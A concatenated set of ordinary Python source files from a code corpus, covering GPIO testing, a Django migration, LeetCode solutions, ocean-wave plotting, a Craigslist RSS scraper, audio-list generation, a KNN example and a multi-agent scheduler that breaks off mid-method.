{"seq_id":"199990672","text":"\"\"\" script to test the interrupt capacity of the pi to the teensy.\neventually will be used to simulate a trial on the treadmill. Pair with\n_2017-2-3_start_stop_trial_test.ino for the teensy. \"\"\"\n\nimport time\nimport RPi.GPIO as GPIO\nGPIO.setmode(GPIO.BCM)\n\ntime.sleep(1)\n\nstartPin = 17\nstopPin = 27\nledPin = 22\n\nGPIO.setup(startPin, GPIO.OUT)\nGPIO.setup(stopPin, GPIO.OUT)\nGPIO.setup(ledPin, GPIO.OUT)\n\n# define start notice function\n\ndef startup():\n    set = ['ready', 'set', 'start']\n    for i in set:\n        GPIO.output(ledPin, GPIO.HIGH)\n        time.sleep(.5)\n        GPIO.output(ledPin, GPIO.LOW)\n        time.sleep(.5)\n        print(i)\n\nstartup()\n\nprint('Trigger Start')\nGPIO.output(startPin, GPIO.HIGH)\ntime.sleep(0.1)\nGPIO.output(startPin, GPIO.LOW)\nGPIO.output(ledPin, GPIO.HIGH)\nprint('triggered, now allow trial to continue for 10 seconds')\ntime.sleep(10)\nprint('End Trigger')\nGPIO.output(ledPin, GPIO.LOW)\nGPIO.output(stopPin, GPIO.HIGH)\ntime.sleep(.1)\nGPIO.output(stopPin, GPIO.LOW)\nGPIO.cleanup()\nprint('End Test')\n\n","sub_path":"interrupt_teensy_test.py","file_name":"interrupt_teensy_test.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"145859354","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n        ('carrito', '0010_receipt'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='detailsale',\n            name='tax',\n            field=models.DecimalField(default=0, verbose_name=b'IVA', max_digits=10, decimal_places=2),\n        ),\n        migrations.AddField(\n            model_name='sale',\n            name='vendor',\n            field=models.ForeignKey(related_name='vendor', verbose_name=b'vendedor', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n        ),\n        migrations.AlterField(\n            model_name='sale',\n            name='user',\n            field=models.ForeignKey(related_name='user', verbose_name=b'cliente', to=settings.AUTH_USER_MODEL),\n        ),\n    ]\n","sub_path":"carrito/migrations/0011_auto_20151226_0835.py","file_name":"0011_auto_20151226_0835.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"457602079","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 1 13:50:15 2017\n\n@author: owen\n\"\"\"\n\n#class Solution(object):\n#    def readBinaryWatch(self, num):\n#        \"\"\"\n#        :type num: int\n#        :rtype: List[str]\n#        \"\"\"\n#        def countOnes(n): # or use 
bin(x).count('1')\n# cnt=0\n# while n:\n# n&=(n-1)\n# cnt+=1\n# return cnt\n# \n# return [\"{:d}:{:02d}\".format(h,m) for h in range(12) for m in range(60) if countOnes(h)+countOnes(m)==num]\n \nclass Solution(object):\n def readBinaryWatch(self, num):\n \"\"\"\n :type num: int\n :rtype: List[str]\n \"\"\"\n res=[]\n for n in range(int(0b1011111011)+1): # 0:00-11:59\n h=n>>6\n m=n & 0x3F # bin(0x3f)='0b111111'\n if h<12 and m<60 and bin(h).count('1')+bin(m).count('1')==num:\n res.append('%d:%02d' %(h,m))\n return res\n \n \nif __name__==\"__main__\":\n print(Solution().readBinaryWatch(1))\n print(Solution().readBinaryWatch(4))","sub_path":"401. Binary Watch.py","file_name":"401. Binary Watch.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"429534248","text":"\"\"\"\n// Time Complexity : o(2^n)\n// Space Complexity : o(n)\n// Did this code successfully run on Leetcode : yes\n// Any problem you faced while coding this : no\n\n\"\"\"\n\nclass Solution:\n def helper(self, nums, path, idx):\n #base\n \n #logic:\n self.res.append(path.copy()) #add all the subsets to result\n for i in range(idx, len(nums)):\n path.append(nums[i]) #add the number encountered to the temp list, path\n \n self.helper(nums, path, i + 1)\n path.pop()#remove the last added number to path\n \n def subsets(self, nums: List[int]) -> List[List[int]]:\n self.res = [] #global\n self.helper(nums,[],0) #start from index 0\n return self.res","sub_path":"Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"348175060","text":"import functools\nimport numpy as np\nfrom xarray.plot.plot import _PlotMethods\n\n\ntry:\n import matplotlib.pyplot as plt\n from matplotlib.projections import PolarAxes\n HAS_MATPLOTLIB = True\nexcept ImportError:\n HAS_MATPLOTLIB = False\n\n\ndef spatial_map(darray, x, y, ax=None, scale=.1, dim='location',\n add_colorbar=True, figure_kw={}, subplot_kw={},\n **kwargs):\n '''Plot data on a spatial map\n\n Creates a subplot for each location in the DataArray and positions\n the subplot on a map. 
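The map axes itself only anchors the locations; the data are drawn in small overlaid subplots. 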
Connects events to both map axes and figure\n to keep the subplots positioned.\n\n Parameters\n ----------\n darray : xarray.DataArray\n DataArray with spatial information\n x : list\n Array with x-coordinates of locations\n y : list\n Array with y-coordinates of locations\n scale : float\n Size of subplots in axes coordinates\n dim : str\n Name of spatial dimensions\n figure_kw : dict\n Options passed to :func:`matplotlib.pyplot.subplots`\n subplot_kw : dict\n Options passed to :func:`matplotlib.pyplot.add_axes`\n kwargs : dict\n Options passed to :meth:`xarray.DataArray.plot`\n\n Returns\n -------\n ax_map : AxesSubplot\n Subplot containing the map\n axs : list of AxesSubplot\n Positionsed subplots visualizing data\n\n '''\n\n if not HAS_MATPLOTLIB:\n raise ImportError('Matplotlib not available')\n\n # create map axis\n if ax is None:\n fig, ax_map = plt.subplots(**figure_kw)\n ax_map.set_aspect('equal')\n else:\n ax_map = ax\n fig = ax.get_figure()\n\n # plot locations to set axis limits\n ax_map.scatter(x, y, c='none', edgecolor='none')\n\n # set default plot options\n plot_kw = {}\n if darray.ndim == 2:\n pass\n elif darray.ndim == 3:\n plot_kw.update(dict(add_colorbar=False,\n vmin = np.min(darray.values),\n vmax = np.max(darray.values)))\n elif darray.ndim == 4:\n pass\n plot_kw.update(**kwargs)\n\n # create a subplot for each location\n axs = []\n for i, (xi, yi) in enumerate(zip(x, y)):\n ax = fig.add_axes([0, 0, 1, 1], label=i, **subplot_kw)\n darray[{dim:i}].plot(ax=ax, **plot_kw)\n ax.coords = (xi, yi)\n ax.set_axis_off()\n\n axs.append(ax)\n\n # add colorbar\n if add_colorbar:\n meshes = [c\n for ax in axs\n for c in ax.get_children()\n if hasattr(c, 'autoscale')]\n if len(meshes) > 0:\n fig.colorbar(meshes[0], ax=ax_map)\n\n # set figure events to update subplot positions\n ax_map.callbacks.connect('xlim_changed', lambda x: position_subplots(ax_map, axs, scale=scale))\n ax_map.callbacks.connect('ylim_changed', lambda x: position_subplots(ax_map, axs, scale=scale))\n\n fig.canvas.mpl_connect('resize_event', lambda x: position_subplots(ax_map, axs, scale=scale))\n fig.canvas.mpl_connect('draw_event', lambda x: position_subplots(ax_map, axs, scale=scale))\n\n # set initial subplot positions\n position_subplots(ax_map, axs, scale=scale)\n\n return ax_map, axs\n\n \ndef position_subplots(ax_map, axs, scale=.1):\n '''Updates subplot positions in map\n\n Parameters\n ----------\n ax_map : AxesSubplot\n Map axes object\n axs : list of AxesSubplot\n List of subplots to be positioned. 
Each axes should have a\n property ``coords`` specifying the target position in data\n coordinates of the map axes.\n scale : float\n Size of subplots in axes coordinates\n\n '''\n\n fig = ax_map.get_figure()\n \n for i, ax in enumerate(axs):\n if not hasattr(ax, 'coords'):\n continue\n\n # get current subplot position in axes coordinates\n pos = ax.get_position()\n pos_scn = ax_map.transData.transform(ax.coords)\n pos_axs = ax_map.transAxes.inverted().transform(pos_scn)\n\n # get position of subplot corners in figure coordinates\n pos_crn = [(pos_axs[0] - scale/2.,\n pos_axs[1] - scale/2.),\n (pos_axs[0] + scale/2.,\n pos_axs[1] + scale/2.)]\n pos_scn = ax_map.transAxes.transform(pos_crn)\n pos_fig = fig.transFigure.inverted().transform(pos_scn)\n\n # update subplot position\n pos.x0 = pos_fig[0,0]\n pos.x1 = pos_fig[1,0]\n pos.y0 = pos_fig[0,1]\n pos.y1 = pos_fig[1,1]\n \n ax.set_position(pos)\n\n\nclass OceanWavesPlotMethods(_PlotMethods):\n\n '''Inheritence class to add map plotting functionality to xarray.DataArray objects'''\n \n def __init__(self, darray, x=None, y=None, **kwargs):\n '''Class initilisation\n\n Parameters\n ----------\n x : list\n Array with x-coordinates\n y : list\n Array with y-coordinates\n args, kwargs\n Arguments passed to super class\n\n '''\n\n if not HAS_MATPLOTLIB:\n raise ImportError('Matplotlib not available')\n \n self._x = x\n self._y = y\n super(OceanWavesPlotMethods, self).__init__(darray, **kwargs)\n\n\n def __call__(self, **kwargs):\n\n # if data is directional, faceted and not yet polar, make it polar\n if 'direction' in self._da.dims:\n if 'col' in kwargs.keys() or 'row' in kwargs.keys():\n if not 'subplot_kws' in kwargs.keys():\n kwargs.update(dict(subplot_kws = dict(projection = 'polar'),\n sharex = False,\n sharey = False))\n\n r = super(OceanWavesPlotMethods, self).__call__(**kwargs)\n\n self.find_axes(r)\n self.rotate_axes()\n \n return r\n\n\n @functools.wraps(spatial_map)\n def spatial_map(self, ax=None, **kwargs):\n '''Plot wave data on map'''\n if self._x is None or self._y is None:\n raise ValueError('Cannot plot map if locations are not defined')\n self._axes = spatial_map(self._da, self._x, self._y, ax=ax, **kwargs)[1]\n self.rotate_axes()\n return self._axes\n\n\n def find_axes(self, r):\n\n # find axes\n try:\n self._axes = r.axes.flatten()\n except:\n try:\n self._axes = r.axes\n except:\n self._axes = r\n\n try:\n iter(self._axes)\n except:\n self._axes = [self._axes]\n \n \n def rotate_axes(self):\n\n # rotate polars\n try:\n for ax in self._axes:\n if isinstance(ax, PolarAxes):\n ax.set_theta_zero_location('N')\n ax.set_theta_direction(-1)\n except:\n pass\n\n\n","sub_path":"oceanwaves/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"64538372","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 3 21:14:03 2018\n\n@author: JohnC\n\nPulls RSS information for our cities\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport sqlite3\nimport logging\nimport datetime\nimport time\nimport random\nfrom cl_car_functions import *\n\n#working_dir = \"c:\\\\Users\\\\JChan\\\\Dropbox\\\\Research\\\\car-buying\\\\\"\nworking_dir = \"c:\\\\Users\\\\Administrator\\\\Dropbox\\\\Research\\\\car-buying\\\\\"\ndb_name = \"Data\\\\car_data.db\"\n\nplaces = [\"atlanta\",\"minneapolis\",\"missoula\"]\nrss_url_start = \"https://\"\nrss_url_end = \".craigslist.org/search/cto\"\nparams = {'format':'rss',\n 
'query':'subaru',\n 's':1}\nmax_pulls = 30 # max per city\n\nlogging.basicConfig(filename=\"\".join([working_dir,\"logs\\\\\",\"rss_pulls.log\"]), \n level=logging.INFO)\n\nlogging.info(\"Starting the RSS pull script: \" + str(datetime.datetime.now()))\n\n \nif not logging.getLogger().isEnabledFor(logging.DEBUG) :\n # Wait between 1 and 30 minutes to add some randomness.\n time.sleep(random.uniform(60,30*60))\n\nlogging.info(\"Done waiting to start: \" + str(datetime.datetime.now()))\n \nwith sqlite3.connect(working_dir + db_name) as con :\n cur = con.cursor()\n \n cur.execute(\"\"\"SELECT DISTINCT post_id\n FROM rss_pull\"\"\")\n \n current_post_ids = set([item[0] for item in cur.fetchall()])\n logging.debug(\"Total post_ids: \" + str(len(current_post_ids)))\n \n total_entries = 0\n for city in places :\n if not logging.getLogger().isEnabledFor(logging.DEBUG) :\n # Wait between 1 and 5 minutes to add some randomness.\n time.sleep(random.uniform(1*60,5*60))\n\n logging.info(\"Done waiting. Starting \" + city + \": \" + \n str(datetime.datetime.now()))\n\n city_entries = 0 # items for the city\n city_pulls = 0\n done_with_city = False\n params['s'] = 0\n \n while not done_with_city :\n rss_page = requests.get(\"\".join([rss_url_start,city,rss_url_end]),\n params=params)\n rss_soup = BeautifulSoup(rss_page.text,\"lxml\")\n \n city_pulls += 1\n pull_results = process_rss_page(rss_soup,cur,\n current_post_ids,\n city)\n \n city_entries += pull_results['items_uploaded']\n \n if (pull_results['total_items'] == 0 or\n city_pulls >= max_pulls) :\n done_with_city = True\n else :\n params['s'] += pull_results['total_items']\n \n total_entries += city_entries\n \n logging.info(\" \".join([\"Just pulled\",str(city_entries),\"values for\",city]))\n \n con.commit()\n logging.info(\" \".join([\"Total new URLs:\",str(total_entries)]))\n \nlogging.info(\"Finished RSS Pull: \" + str(datetime.datetime.now()) + \"\\n\\n\")\n","sub_path":"craigslist-scrape/pull_rss.py","file_name":"pull_rss.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"646539730","text":"import logging\nfrom glob import glob\n\nimport pdb\n\nclass Dataset():\n def __init__(self, path, mixPath = \"\", speakersPath = [], sample_rate = 8000):\n self.path = path\n self.mix = sorted(glob(path+mixPath+'/*.wav', recursive=False)) # ndarray of names of all samples\n self.speakers = [sorted(glob(path+speakerPath+'/*.wav', recursive=False)) for speakerPath in speakersPath] # ndarray of ndarrays of speakers sample names\n def __len__(self):\n return len(self.mix)\n def __getitem__(self, idx):\n return {\"mix\": self.mix[idx], \n \"speakers\": [speaker[idx] for speaker in self.speakers]}\n\ndef generate(path):\n print(\"Generating SCPs for path:\", path)\n fmix = open(path+\"mix.scp\", 'w')\n fs1 = open(path+\"spk1.scp\", 'w')\n fs2 = open(path+\"spk2.scp\", 'w')\n dataset = Dataset(path, \"mix\", [\"s1\",\"s2\"])\n for i in dataset:\n fmix.write(i[\"mix\"].split('/')[-1].strip('.wav')+\" \"+i[\"mix\"]+\"\\n\")\n fs1.write(i[\"speakers\"][0].split('/')[-1].strip('.wav')+\" \"+i[\"speakers\"][0]+\"\\n\")\n fs2.write(i[\"speakers\"][1].split('/')[-1].strip('.wav')+\" \"+i[\"speakers\"][1]+\"\\n\")\n fmix.close()\n fs1.close()\n fs2.close()\n\ndef generateFile(pathToFolder, pathToFile):\n print(\"Generating SCP\", pathToFile, \"for path:\", pathToFolder)\n fs = open(pathToFile, 'w')\n\n folder = sorted(glob(pathToFolder+'/*.wav', recursive=False)) # 
ndarray of names of all samples\n    for i in folder:\n        #print(i.split('/')[-1].strip('.wav')+\" \"+i+\"\\n\")\n        fs.write(i.split('/')[-1].strip('.wav')+\" \"+i+\"\\n\")\n    fs.close()\n    print(\"Generated\")\n\n\nif __name__ == \"__main__\":\n    #generate(\"../min_dataset/tr/\")\n    #generate(\"../min_dataset/cv/\")\n    #generate(\"../min_dataset/tt/\")\n    generateFile(\"./out/1/spk1\", \"./out/1/spk1.scp\")\n    generateFile(\"./out/1/spk2\", \"./out/1/spk2.scp\")","sub_path":"generate_scp.py","file_name":"generate_scp.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"481961766","text":"import numpy as np\nimport matplotlib.pyplot as plt\n# machine learning library and datasets\nfrom sklearn import neighbors, datasets\n\n# Load the iris data, which stores sepal and petal length and width, 4 attributes in total.\n# The iris samples fall into three classes.\n# iris has two attributes: iris.data and iris.target\n# data is a matrix; each of its 4 columns holds the length or width of a sepal or petal, and each of its 150 rows is one measured iris plant\n# target is an array of length 150 that stores which class each record in data belongs to; since there are 3 iris classes, its values are 0, 1 and 2.\niris = datasets.load_iris()\n\n# To keep the data easy to read, we only take sepal length and width.\nX = iris.data[:, :2]\ny = iris.target\n\n# Get the minimum and maximum of the data and widen them to set up the coordinate system; note that y_min and y_max store sepal widths, not iris classes\nx_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\ny_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n\n# step size in the mesh\nh = .02\n\n# meshgrid() builds coordinate matrices; it must be passed two one-dimensional numeric arrays\nxx, yy = np.meshgrid(np.arange(x_min, x_max, h),np.arange(y_min, y_max, h))\n\n\n# number of instance points\nk = 15\n# create a KNN classifier; the k value and the voting scheme must be set\nclf = neighbors.KNeighborsClassifier(n_neighbors=k, weights='uniform')\n# fit the classifier with the training data\nclf.fit(X, y)\n\n\n# set the value range of the axes\nplt.xlim(xx.min(), xx.max())\nplt.ylim(yy.min(), yy.max())\n\n# set the axis labels\n#plt.xlabel(u'Sepal_Length')\n#plt.ylabel(u'Sepal_Width')\n\n# render and show the figure\nplt.show()\n","sub_path":"Code/untitled1/KNN_2.py","file_name":"KNN_2.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"463277553","text":"import time, datetime\nimport logging\nfrom copy import deepcopy\nfrom collections import deque\nfrom itertools import count\n\nCRITICAL = logging.CRITICAL\nFATAL = CRITICAL\nERROR = logging.ERROR\nWARNING = logging.WARNING\nWARN = WARNING\nINFO = logging.INFO\nDEBUG = logging.DEBUG\nNOTSET = logging.NOTSET\n\nLOG_LEVEL = logging.DEBUG\n\n\nclass MasLiteException(Exception):\n    pass\n\n\nuuid_counter = count(1)\n\n\nclass AgentMessage(object):\n    \"\"\"\n    BaseMessage checks whether the sender and receiver are\n    WorldBaseObjects and automatically retrieves their ids.\n    If the receiver is None, the message is considered a broadcast\n    where the mailman needs to figure out who is subscribing and\n    how to get it to the subscribers.\n    \"\"\"\n\n    def __init__(self, sender, receiver=None, topic=None):\n        \"\"\"\n        :param sender: The agent (class Agent) or agent-uuid of the sender\n        :param receiver: None (broadcast) or The agent (class Agent) or agent-uuid of the receiver\n        :param topic: The topic; default is self.__class__.__name__ of the message subclass\n        \"\"\"\n        self._sender = None\n        self.sender = sender # sender must be an agent, as a response otherwise can't be returned.\n        self._receiver = None\n        self.receiver = receiver # the uuid of the receiving agent.\n        if topic is None:\n            topic = self.__class__.__name__\n        self._topic = topic # the keyword that the receiver should react upon.\n        self._uuid = next(uuid_counter)\n\n    def __str__(self):\n        return \"From -> To : {} -> {} Topic: {}\".format(self.sender, self.receiver, self.topic)\n\n    @property\n    def sender(self):\n        return 
self._sender\n\n    @sender.setter\n    def sender(self, sender):\n        \"\"\"\n        :param sender: the sender (FROM)\n        :return:\n        \"\"\"\n        if isinstance(sender, Agent):\n            self._sender = sender.uuid\n        elif sender is None:\n            self._sender = None\n        else:\n            self._sender = sender\n\n    @property\n    def receiver(self):\n        return self._receiver\n\n    @receiver.setter\n    def receiver(self, receiver):\n        \"\"\"\n        :param receiver: the intended receiver of the message. Typically the sending\n        agent's uuid (so that a reply can find its way back), retrievable as agent.uuid.\n        If the receiver is None, the message is treated as a broadcast to all subscribers\n        of the topic. If there are no subscribers of that topic, the mailman will drop\n        the message.\n        :return:\n        \"\"\"\n        if isinstance(receiver, Agent):\n            self._receiver = receiver.uuid\n        elif receiver is None:\n            # If receiver is None, the message is treated as a\n            # broadcast to all subscribers of the topic.\n            # NB. If there are no subscribers of that topic, the mailman\n            # will drop the message...\n            self._receiver = None\n        else:\n            self._receiver = receiver\n\n    def copy(self):\n        \"\"\"\n        :return: deep copy of the object.\n        \"\"\"\n        return deepcopy(self)\n\n    @property\n    def topic(self):\n        \"\"\"\n        :return: The topic of the message. Typically the same as Message.__class__.__name__\n        \"\"\"\n        return self._topic\n\n    @topic.setter\n    def topic(self, topic):\n        self._topic = topic\n\n    @property\n    def uuid(self):\n        \"\"\"\n        :return: returns the UUID of the message.\n        \"\"\"\n        return self._uuid\n\n    @uuid.setter\n    def uuid(self, value):\n        raise ValueError(\"UUID is permanent throughout the message's lifetime and cannot be set after instantiation.\")\n\n\nclass Agent(object):\n    \"\"\" The default agent class. \"\"\"\n    uuid_counter = count(1)\n\n    def __init__(self, uuid=None):\n        \"\"\"\n        :param uuid: None (default). Should only be set for inspection purposes.\n        \"\"\"\n        self.inbox = deque() # when using self.receive() we get the messages from here\n        if uuid is None:\n            self._uuid = next(Agent.uuid_counter) # this is our worldwide unique id.\n        else:\n            try:\n                _ = hash(uuid)\n            except TypeError:\n                raise TypeError(\"uuid must be hashable.\")\n            self._uuid = uuid\n        self._scheduler_api = None\n        self.operations = dict() # this is the link between msg.topic and the agent's response.\n        self.keep_awake = False # this prevents the agent from entering sleep mode when there\n        # are no new messages.\n\n    @property\n    def uuid(self):\n        \"\"\"\n        :return: Returns the UUID of the agent. 
This is guaranteed to be volatile and unique.\n        No two runs of the same simulation will have agents with the same UUID.\n\n        beginner errors:\n        Q: Agent does not have attribute \"uuid\".\n        A: You forgot to run super().__init__() on the Agent class.\n        \"\"\"\n        return self._uuid\n\n    @uuid.setter\n    def uuid(self, value):\n        raise ValueError(\"UUID cannot be set once the object has been instantiated\")\n\n    def __str__(self):\n        return \"<{}> uuid: {}\".format(self.__class__.__name__, self._uuid)\n\n    def __repr__(self):\n        return \"<{}> uuid: {}\".format(self.__class__.__name__, self._uuid)\n\n    def send(self, msg):\n        \"\"\" The only method for sending messages in the system.\n        :param msg: an instance of AgentMessage.\n        :return: None\n        \"\"\"\n        assert isinstance(msg, AgentMessage), \"sending messages that aren't based on AgentMessage won't work\"\n        assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n        self._scheduler_api.mail_queue.append(msg)\n\n    @property\n    def messages(self):\n        \"\"\"\n        :return: Boolean: True if there are messages.\n        \"\"\"\n        if len(self.inbox) > 0:\n            return True\n        else:\n            return False\n\n    def receive(self):\n        \"\"\"\n        :return: Returns an AgentMessage if any, otherwise None.\n        \"\"\"\n        if self.messages:\n            return self.inbox.popleft()\n        else:\n            return None\n\n    def setup(self):\n        \"\"\" Users can implement this setup method for starting up the kernel agent.\n\n        NB! This method runs automatically when the agent is added to the scheduler !\n\n        Cascades of setups are possible using the message AddNewAgent, such as for example:\n\n        class Minion(Agent):\n            def __init__(minion_id):\n                ...\n\n\n        for minion in range(minions):\n            m = Minion(minion_id=minion)\n            msg = AddNewAgent(sender=self, agent=m)\n            self.send(msg)\n\n        A good approach is to have a function for each message topic and register the\n        functions in the Agent's class' operations at setup:\n\n        def setup(self):\n            self.subscribe(self.uuid)\n\n            self.operations.update({\"new request\": self.new_request,\n                                    \"hello\": self.receive_hello_msg})\n\n            for topic in self.operations:\n                self.subscribe(topic)\n        \"\"\"\n        pass\n\n    def teardown(self):\n        \"\"\"Users can implement this teardown method for shutting down the kernel agent.\n\n        ! Runs automatically when the agent is removed from the scheduler !\n\n        \"\"\"\n        pass\n\n    def update(self):\n        \"\"\" Users must implement the update method using:\n            send(msg)\n            receive(msg)\n        examples of CnC signals are the classes `StartMessage` and `StopMessage`\n\n        A good approach is to use:\n\n        while self.messages:\n            msg = self.receive()\n            operation = self.operations.get(msg.topic)\n            if operation is not None:\n                operation(msg)\n            else:\n                self.logger(\"%s %s: don't know what to do with: %s\" %\n                            (self.__class__.__name__, str(self.uuid)[-6:], str(msg)),\n                            log_level=\"DEBUG\")\n\n        If some messages take precedence over others (priority messages), the\n        inbox should be emptied in the beginning of the update function for\n        sorting. 
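This way, urgent topics are handled before ordinary traffic within the same update. 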
For example:\n\n priority_topics = [1,2,3]\n priority_messages = deque() # from collections import deque\n normal_messages = deque()\n while self.messages:\n msg = self.receive()\n if msg.topic in priority_topics:\n priority_messages.append(msg)\n else:\n normal_messages.append(msg)\n priority_messages.extend(normal_messages)\n while len(priority_messages) > 0:\n msg = priority_messages.popleft()\n \"\"\"\n raise NotImplementedError(\"derived classes must implement a update method\")\n\n def log(self, msg, level=NOTSET):\n \"\"\"\n :param msg: str or AgentMessage\n :param level: int\n :return:\n \"\"\"\n assert isinstance(self._scheduler_api, Scheduler)\n self._scheduler_api.log(level, msg)\n\n def set_alarm(self, alarm_time, alarm_message=None, relative=False, ignore_alarm_if_idle=True):\n \"\"\" to set alarms\n\n :param alarm_time: time as timestamp() (float)\n :param alarm_message: AgentMessage, if None the scheduler will run \"update\" on the agent once.\n :param relative: boolean (1 second later is relative)\n True: alarm goes off at time.time() + alarm_time\n False: alarm goes off at alarm_time (must be greater than time.time() )\n :param ignore_alarm_if_idle: boolean, if True, the scheduler will ignore that an alarm was set,\n if there are no more messages being exchanged.\n \"\"\"\n assert isinstance(alarm_time, (float, int)), \"expected float or int time. Use time.time() or datetime.datetime.now().timestamp()\"\n now = time.time()\n if relative:\n alarm_time = now + alarm_time\n\n if alarm_time < now:\n raise ValueError(\"Alarm time is in the past\")\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.set_alarm(uuid=self.uuid, alarm_time=alarm_time,\n alarm_message=alarm_message,\n ignore_alarm_if_idle=ignore_alarm_if_idle)\n\n def subscribe(self, topic):\n \"\"\"\n A method to be used by the agent to set and subscribe to a particular topic\n :param topic: string\n\n Examples:\n To subscribe to messages for the agent itself, use: topic=self.uuid\n\n To subscribe to messages for the agents own class (including class broadcasts),\n use: topic=self.__class__.__name__\n\n To subscribe to messages of a particular subject, use:\n topic=AgentMessage.__class__.__name__\n\n \"\"\"\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.subscribe(uuid=self.uuid, topic=topic)\n\n def unsubscribe(self, topic=None):\n \"\"\" A method to be used by the agent to unset and unsubscribe to a particular topic\n :param topic: string or None. If None, the agent unsubscribes from everything.\n\n Note that all agents automatically unsubscribe at teardown.\n \"\"\"\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.unsubscribe(uuid=self.uuid, topic=topic)\n\n def get_subscriber_list(self, topic):\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n return self._scheduler_api.get_subscriber_list(topic)\n\n def get_subscription_topics(self):\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n return self._scheduler_api.get_subscription_topics()\n\n def pause(self):\n \"\"\" Tells the scheduler to stop at the end of the update cycle. 
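The flag is checked at the top of the scheduler's run loop, so the update cycle in progress always completes first. 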
\"\"\"\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.pause()\n\n def add(self, agent):\n \"\"\" Adds the agent to the scheduler. \"\"\"\n assert isinstance(agent, Agent)\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.add(agent)\n\n def remove(self, uuid):\n \"\"\" Removes the agent from the scheduler. \"\"\"\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.remove(uuid)\n\n\nclass SchedulerException(MasLiteException):\n pass\n\n\nclass Alarm(object):\n \"\"\" Data structure for the Schedulers alarm\"\"\"\n __slots__ = ['uuid', 'alarm_time', 'alarm_message', 'ignore_alarm_if_idle']\n\n def __init__(self, uuid, alarm_time, alarm_message, ignore_alarm_if_idle):\n self.uuid = uuid\n self.alarm_time = alarm_time\n self.alarm_message = alarm_message\n self.ignore_alarm_if_idle = ignore_alarm_if_idle\n\n\nclass Scheduler(object):\n \"\"\" The scheduler that handles updates of all agents.\"\"\"\n\n def __init__(self, logger=None):\n \"\"\"\n :param logger: optional: logging.logger\n \"\"\"\n self.mail_queue = deque()\n self.mailing_lists = {}\n self.agents = dict()\n self.needs_update = set()\n self.has_keep_awake = set()\n self.alarms = []\n self._must_run_until_alarm_expires = False\n\n self._quit = False\n self._operating_frequency = 1000\n\n if logger is None:\n self._logger = logging.getLogger(self.__class__.__name__)\n self._logger.setLevel(LOG_LEVEL)\n self._logger.propagate = False\n if not any(isinstance(h, logging.StreamHandler) for h in self._logger.handlers):\n handler = logging.StreamHandler()\n handler.setLevel(LOG_LEVEL)\n self._logger.addHandler(handler)\n else:\n self._logger = logger\n\n def log(self, level, msg):\n self._logger.log(level, msg)\n\n def add(self, agent):\n \"\"\" Adds an agent to the scheduler\n :param agent: Agent\n \"\"\"\n assert isinstance(agent, Agent)\n self.log(level=DEBUG, msg=\"Registering agent {} {}\".format(agent.__class__.__name__, agent.uuid))\n if agent.uuid in self.agents:\n raise SchedulerException(\"Agent uuid already in usage.\")\n self.agents[agent.uuid] = agent\n agent._scheduler_api = self\n self.subscribe(agent.uuid, topic=agent.uuid)\n self.subscribe(agent.uuid, topic=agent.__class__.__name__)\n agent.setup()\n\n if agent.keep_awake:\n self.has_keep_awake.add(agent.uuid)\n self.needs_update.add(agent.uuid)\n\n def remove(self, agent_or_uuid):\n \"\"\" Removes an agent from the scheduler\n :param agent_or_uuid: Agent or uuid of the agent.\n \"\"\"\n if not isinstance(agent_or_uuid, Agent):\n agent = self.agents.get(agent_or_uuid, None)\n if agent is None:\n raise ValueError(\"Agent not found: {}\".format(agent_or_uuid))\n else:\n agent = agent_or_uuid\n assert isinstance(agent, Agent)\n\n if agent.uuid not in self.agents:\n self.log(level=DEBUG, msg=\"Agent exists but hasn't been added: {}\".format(agent_or_uuid))\n return\n\n self.log(level=DEBUG, msg=\"DeRegistering agent {}\".format(agent.uuid))\n agent.teardown()\n self.unsubscribe(agent.uuid)\n if agent.uuid in self.needs_update:\n self.needs_update.remove(agent.uuid)\n if agent.uuid in self.has_keep_awake:\n 